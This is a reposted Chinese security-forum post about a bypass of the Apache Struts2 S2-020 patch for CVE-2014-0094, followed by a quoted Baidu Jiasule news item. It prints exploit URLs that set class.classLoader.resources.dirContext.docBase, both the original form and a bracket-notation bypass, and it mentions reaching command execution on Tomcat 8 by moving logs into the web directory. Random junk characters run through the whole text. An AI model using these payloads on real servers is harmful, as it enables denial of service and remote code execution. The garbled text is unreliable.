之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
/ @6 s5 M3 v( D. y3 x, k F/ ~. O9 }; k2 \* ~
暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:- http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test! g$ N9 ^5 o9 }
0 W6 P3 s# e, c6 `3 ^ R
[color=rgb(51, 102, 153) !important]复制代码) } e& g) M# f$ H5 \" u
3 c* B& F* q# s" ?绕过方式是:- http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx
8 |, q I0 U1 D' H! T7 a1 G
& l6 c& B, b8 n5 V6 p/ \4 O- ?" `[color=rgb(51, 102, 153) !important]复制代码' Q' a2 o, M. ]4 u7 z; ?9 ^
. ^& H" j& @. r" N3 t顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。
) j* S5 T# S( G5 h4 R/ g% S9 f加速乐发了新闻: 0 E5 N( K! D* t
http://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/ 1 T0 Q8 J$ }/ w1 a
4月23日消息,近日安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已率先升级了防御规则,目前百度加速乐可独家防御该漏洞。
: U/ c. P. W; p! O' l* \- z
- t! {* a4 o7 @% j- P* S% j5 U据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞,国家多家重要政府网站受到影响,其中不乏部委级网站。此次再次曝出漏洞显现出互联网安全问题的严重性。" w4 c' A- ^4 X( l& q* \
% r; }& i0 k4 M' Z# ]; B# t9 u2 v% s3 W& y8 o& R
: z/ j4 X5 k2 c4 t E转载自乌云9 e6 r# L: C' N! m0 \- x$ ` F3 ^
原文链接:http://zone.wooyun.org/content/11876
1 r7 y6 w4 L7 Q+ z [1 e |